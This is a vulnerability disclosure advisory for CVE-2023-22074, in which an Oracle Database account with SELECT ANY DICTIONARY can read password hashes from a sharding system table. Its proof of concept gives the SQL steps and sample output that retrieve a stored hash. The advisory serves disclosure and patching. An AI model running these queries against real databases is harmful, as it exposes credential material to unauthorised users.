Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component Product: Database Manufacturer: Oracle Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11] Tested Version(s): 19c Risk Level: Low Solution Status: Fixed CVE Reference: CVE-2023-22074 Base Score: 2.4 Author of Advisory: Emad Al-Mousa ***************************************** Vulnerability Details: Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup. ***************************************** Proof of Concept (PoC): I will create an account called “jim” in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege: SQL> alter session set container=ORCLPDB1; Session altered. SQL> create user jim identified by jim123; User created. SQL> grant create session,select any dictionary to jim; Grant succeeded. I will now connect using database account “jim” and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component: sqlplus "jim/jim123"@ORCLPDB1 SQL> show user USER is "JIM" SQL> select * from SYS.DDL_REQUESTS_PWD; DDL_NUM PWD_BEGIN ---------- ---------- ENC_PWD -------------------------------------------------------------------------------- 123 445 E494684108560FFEF1C17CDE72F36A1A ***************************************** References: https://www.oracle.com/security-alerts/cpuoct2023.html https://nvd.nist.gov/vuln/detail/CVE-2023-22074 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074 https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/ https://github.com/emad-almousa/CVE-2023-22074